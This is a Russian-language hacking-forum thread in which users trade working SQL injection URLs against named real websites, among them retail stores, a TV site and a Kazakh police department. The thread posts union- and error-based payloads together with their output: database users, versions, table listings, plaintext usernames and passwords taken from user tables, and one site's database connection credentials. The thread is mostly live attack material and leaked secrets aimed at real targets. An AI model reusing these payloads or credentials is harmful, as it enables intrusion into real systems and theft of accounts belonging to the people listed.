ANTICHAT — форум по информационной безопасности, OSINT и технологиям

Центр информационных технологий

http://itex.ru/po/sale/?pid=-4+union+select+1/*
user - itex@cub.mplik.ru
database - itex
version - 5.0.41-log


Интересные таблицы
amarant_users
analitika_hackers
analitika_users
apm_admin
apm_hackers
asbest_users
atmosphere_admin

http://www.bamba.ru/product.asp?view=56634+or+1=(select+system_user)

http://www.bamba.ru/product.asp?view=56634+or+1=(select+db_name())

http://www.bamba.ru/product.asp?view=56634+or+1=@@version


bd_user: frontcontent


bd_name:bamba

http://www.bamba.ru/product.asp?view=56634+or+1=@@version

version:
Microsoft SQL Server 2000 - 8.00.2039 (Intel X86)
May 3 2005 23:18:38
Copyright (c) 1988-2003 Microsoft Corporation
Enterprise Edition on Windows NT 5.2 (Build 3790: Service Pack 2)

-----------------------

http://www.bamba.ru/product.asp?view=56634+or+1=(select+top+1+table_na me+from+information_schema.tables+where+table_name +not+in+('GROUP_MEMBERSHIP','GROUP_RIGHTS','CONTEN T_5','CONTENT_26','CONTENT_20','SITE','main_catalo g','SYSTEM_VARS','USER_RIGHTS','CONTENT_TYPE','PAG E','ATTRIBUTE_GROUP','ATTRIBUTE_TYPE','BACKEND_SEC TION','catalog','CONTAINER','CONTAINER_TYPE','CONT ENT','CONTENT_1','CONTENT_10','CONTENT_11','CONTEN T_12','CONTENT_13','CONTENT_14','CONTENT_15','CONT ENT_16','CONTENT_17','CONTENT_18','CONTENT_19','CO NTENT_2','CONTENT_21','CONTENT_22','CONTENT_23','C ONTENT_24','CONTENT_3','CONTENT_4','CONTENT_6','CO NTENT_7','CONTENT_8','CONTENT_9','CONTENT_ATTRIBUT E','CONTENT_DATA','CONTENT_LINK','CONTENT_STATUS', 'CONTENT_TYPE_GROUP','CONTENT_TYPE_LINK','DB_VERSI ON','dtproperties','FORMAT','GROUP_ROLE','LANGUAGE ','MEMBER','MEMBER_CONTENT','OBJECT','ROLE','ROLE_ RIGHTS','SITE_LANG','SITE_SECTIONS','sysconstraint s','syssegments','SYSTEM_VARS_GROUP','t_jiaozhu',' TEMPLATE','UNIT','UNIT_SETTING','USER_GROUP','USER _ROLE'))

получаем таблицу 'USERS'
--------------------------------------
Получаем структуру таблицы users

http://www.bamba.ru/product.asp?view=56634+or+1=(select+top+1+column_n ame+from+information_schema.columns+where+table_na me='USERS'+and+column_name+not+in+('created','disa bled','full_name','login','modified','password','site_id'))

---------------------------------------

http://www.bamba.ru/product.asp?view=56634+or+1=(select+top+1+cast(log in+as+nvarchar)%2B%27%3A%27%2Bcast(password+as+nva rchar)+from+users)--

login:MNBorisow
password:ma3569

-------------------------
http://www.bamba.ru/product.asp?view=56634+or+1=(select+top+1+cast(log in+as+nvarchar)%2B%27%3A%27%2Bcast(password+as+nva rchar)+from+users+where+login+not+in+('MNBorisow') )--

loginVStebunov
pass:12345678

----------------------------------------------------
http://www.bamba.ru/product.asp?view=56634+or+1=(select+top+1+cast(log in+as+nvarchar)%2B%27%3A%27%2Bcast(password+as+nva rchar)+from+users+where+login+not+in+('MNBorisow', 'DVStebunov'))--


login:yy
pass:moscow1


------------------------------------------------------
http://www.bamba.ru/product.asp?view=56634+or+1=(select+top+1+cast(log in+as+nvarchar)%2B%27%3A%27%2Bcast(password+as+nva rchar)+from+users+where+login+not+in+('MNBorisow', 'DVStebunov','yy'))--

login:GLazukin
pass:GP97sl



И.Т.Д.

http://nce.iatp.org.ua/index.php?action=events&show=events&id=8+UNION+SEL ECT+1,2,3,4,5,6,concat_ws(char(58),version(),user( ),database())+LIMIT+1,1/*
4.1.22
nce@hosting.iatp.org.ua
nce

Серверное и сетевое оборудование
http://okta.ru/articles/?id=-1204722526+UNION+SELECT+1,concat(user(),0x3a,versi on(),0x3a,database()),3/*
user - okta_admin@localhost
version - 4.0.24_Debian-10sarge2-log
database - okta_admin

стомотология...
(см. в <title>5.0.41-log:ctoma:ctoma@localhost)

sql inject на дамском клубе
http://www.tdktv.ru/index.php?menu=program&id=- 1+union+select+1,concat(username,char(58),user_pas sword),3+from+phpbb_users+limi
t+1,2
вот данные для коннекта к БД

"dblogin" => "tdktvru_user"
"dbpass" => "markus25let"
"dbhost" => "mysql.nthost.ru"
"dbname" => "tdktvru_common"

sql-injection на Департаменте вн.дел Каз. области
http://kostanaypolice.kz/index.php?id=-1)+union+select+1,user(),3+from+relise/*

Таблыцы:

http://www.countryman.com/store/product.asp?id=1+or+1=(select+top+1+table_name+fro m+information_schema.tables+where+table_name+not+i n('MODELS','NEWSLETTER','PAGE_groups','pages','pay ment','address','assets','assets_type','brands','c art','cartitems','category','connector_key','conne ctors','connectors_b3','connectors_b6','connectors _choir','connectors_e6','connectors_emw','connecto rs_headset','connectors_isomax2','contactus','down loads','items','pdfs','pdftoproducts','preferences ','PREFERENCES_SECURE_STYLES','PREFERENCES_SHIPPIN G','PREFtoSHIP_SERVICES','PREFtoSHIP_VENDORS','pri ces','PRODtoCAT','products','promo_codes','SHIPPIN G_SERVICES','SHIPPING_VENDORS','sysconstraints','s yssegments','))--&catid=

ПАЛЯ :Р

http://www.countryman.com/store/product.asp?id=1+or+1=(select+top+1+column_name+fr om+information_schema.columns+where+table_name='us ers'+and+column_name+not+in('Active','Admin','Bill ingAddressID','CompanyName','EndDate','Name','Pass word','PrefID','ShippingAddressID','TheDate','User ID','UserName'))--

Бес понятия, боян или нет, но вот.

http://www.countryman.com/store/product.asp?id=1+or+1=(select+top+1+cast(UserID+as +nvarchar)%2B%27%3A%27%2Bcast(Password+as+nvarchar )%2B%27%3A%27%2Bcast(Admin+as+nvarchar)%2B%27%3A%2 7%2Bcast(name+as+nvarchar)+from+users+where+UserID =1)--v



Остальное влом :Р, спасибо Анатолию за стотью:-Р

Бес понятия, боян или нет, но вот.

http://www.countryman.com/store/product.asp?id=1+or+1=(select+top+1+cast(UserID+as +nvarchar)%2B%27%3A%27%2Bcast(Password+as+nvarchar )%2B%27%3A%27%2Bcast(Admin+as+nvarchar)%2B%27%3A%2 7%2Bcast(name+as+nvarchar)+from+users+where+UserID =1)--v



Остальное влом :Р, спасибо Анатолию за стотью:-Р[/QUOTE]
http://www.countryman.com/store/product.asp?id=1+or+1
тот же самый результат